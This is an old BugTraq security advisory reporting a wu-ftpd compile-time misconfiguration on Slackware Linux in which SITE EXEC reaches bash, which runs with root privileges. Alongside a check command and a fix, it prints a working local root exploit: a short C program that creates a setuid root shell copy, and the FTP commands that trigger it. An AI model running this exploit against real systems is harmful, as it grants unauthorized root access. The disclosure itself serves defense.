The following is gleaned from the BugTraq mailing list: ------------------------------------------------------- Since Bugtraq is exceptionally quiet lately, I though I should make it come alive again with this discussion of the bug that was reported in the wu.ftpd that comes with some Slackware distributions of Linux. The report was just before Bugtraq went down for a long time, but I've found the bug still to be present on all the Linux machines that I have access to. So maybe it needs to be brought a little more in the open. Here we go: ObBug: - Short description of the bug It involves wu.ftpd being misconfigured at compile time and allowing SITE EXEC access to /bin (for anonymous or otherwise chroot-ed users this is ~ftp/bin). Now if in this /bin resides a program that gives access to executables outside /bin, but in the users reach (such as /bin/bash that gives access to the user's homedir), this opens up a root vulnerability. This should have been set to /bin/ftp-exec and which be set by the _PATH_EXECPATH variable in src/pathnames.h before compiling. The wu-ftpd-2.4_linux.tgz that I found somewhere on the net has this securely set as default value. - How to check ? $ ftp -n localhost user: password: ftp> quote site exec bash -c id If vulnerable it gives here: uid=0, gid=0, euid=, egid= Of course, bash should not be available at all - How to exploit (in case your sysadmin or you think the above is not a problem) go to your homedir and make a program: duh.c (or whatever) main() { seteuid(0); setegid(0); system("/bin/cp /bin/sh ./sh"); system("/bin/chmod 6755 ./sh"); } $ make duh $ ftp -n localhost (and login) user: password: ftp> quote site exec bash -c duh ftp> quit $ ./sh bash# (voila, QED) - How to fix? Get the source of wu-ftpd-2.4.linux.tar.gz (stock wu-ftpd-2.4 from wuarchive doesn't compile on linux) and compile it; you might want to define the _PATH_PIDNAMES and _PATH_XFERLOG to other values there...(/usr/adm/ftp.pids-%s and /usr/adm/xferlog for example). If you cannot find that I can email the source to you,...if you trust the source I took somewhere unmodified and if you trust me ;-) An arch search for wu-ftpd-2.4 will give you sites too. I can remember that I got it that way. $) Henri Karrenbeld ----------------------------------------------------------------------------- Hardware, n.: The parts of a computer system that can be kicked. -----------------------------------------------------------------------------